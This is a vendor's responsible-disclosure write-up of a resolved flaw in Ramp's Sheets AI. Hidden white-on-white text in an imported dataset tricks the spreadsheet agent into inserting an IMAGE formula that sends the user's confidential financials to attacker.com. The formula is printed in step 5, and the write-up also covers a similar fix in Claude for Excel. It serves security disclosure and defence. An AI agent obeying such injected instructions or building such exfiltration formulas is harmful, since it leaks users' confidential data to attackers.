Solutions

Industries

Partners

Resources

Book a Demo

Threat Intelligence

Table of Content

Ramp’s Sheets AI Exfiltrates Financials

A vulnerability in Ramp's Sheets AI allowed the agent to insert formulas that made external network requests without user approval, creating the risk of data exfiltration via indirect prompt injection.

This vulnerability was responsibly disclosed to Ramp, and Ramp’s security team has indicated the issue was resolved on March 16, 2026.

Ramp's Sheets AI Exfiltrates Financials

Context

Ramp's Sheets AI is an agentic product that helps users operate on spreadsheets, comparable to Claude for Excel. The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication.

Ramp’s security team has indicated that, following our report, the issue was resolved. We appreciate Ramp’s dedication to maintaining a strong AI security posture and addressing vulnerabilities as they arise. Further details on the responsible disclosure are at the end of the article.

In this article, we demonstrate that an indirect prompt injection concealed in an untrusted, externally sourced dataset could trigger the exfiltration of confidential financial data from the user’s workspace by manipulating Ramp’s AI to insert a malicious formula. No user approval is required.

PromptArmor identified a very similar risk in Claude for Excel – details on the remediations applied by Anthropic are at the bottom of the article.

The Attack Chain

  1. The user opens a workbook containing a confidential financial model

    A financial model is opened in Ramp AI Sheets.


  2. The user imports an external dataset to complement their model

    A spreadsheet containing industry growth statistics is imported into a separate tab from the financial model. The user aims to compare their company’s growth to industry benchmarks. The reference dataset comes from an untrusted external source, e.g., a website, an email, or a shared drive.

    An external reference dataset is added to the workbook.


  3. The reference dataset contains a concealed prompt injection

    A reference data set contains an indirect prompt injection.

    An indirect prompt injection is hidden in white-on-white text, and is crafted to manipulate Ramp’s AI to:
    (1) collect sensitive data
    (2) generate a formula with that data that will make an external network request
    (3) insert that formula automatically into a user’s spreadsheet.


  4. The user asks Ramp AI to compare their financial model against the industry statistics

    The user submits a benign query to Ramp AI.


  5. Ramp AI falls for the prompt injection and inserts a malicious formula

    Ramp AI is manipulated into building an IMAGE formula that uses an attacker’s URL and appends the victim’s sensitive data to the end of the link.

    =IMAGE(“https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}”)

    A malicious formula is inserted by Ramp AI, exfiltrating financials.


  6. The malicious formula makes a network request, exfiltrating financial data

    Ramp AI inserts the malicious formula without requiring any user approval. The malicious formula triggers a network request to the attacker’s server. This network request exposes the sensitive financial data that was in the initial confidential “Financial Model” sheet (which Ramp AI included in the formula due to the attacker’s prompt injection).

    Below, the attacker’s server logs display the victim’s sensitive financial data:

    Financial data is exfiltrated by Ramp AI to the attacker's server.


Responsible Disclosure

The PromptArmor Threat Intel Team responsibly disclosed this vulnerability to Ramp. Ramp's security team indicated that the issue was resolved on March 16, 2026.

Timeline

Feb 19, 2026 PromptArmor discloses via security@ramp.com
Feb 27, 2026 PromptArmor follows up
Mar 13, 2026 PromptArmor follows up
Mar 14, 2026 Ramp confirms receipt of report; notes that the initial report was submitted during a transition period between disclosure programs, explaining the delay in initial response.
Mar 16, 2026 Ramp states: “Thank you again for your report. This issue was resolved earlier today at approximately noon eastern time.”

How Claude for Excel Remediated

When Claude for Excel was released, PromptArmor identified a nearly identical risk – malicious formulas could trigger data exfiltration without users being presented an adequate opportunity for informed human review.

Claude in Excel improved human in the loop protections.

Note: Claude for Excel did leverage human-in-the-loop, but malicious formulas were not visible in the editing approval prompt, thereby impairing the protection's efficacy.

Anthropic updated Claude for Excel to display a red warning interstitial when a formula that can cause external network traffic is being inserted. The new warning displays the full formulas being inserted, and the documentation was updated to better inform users of the risk.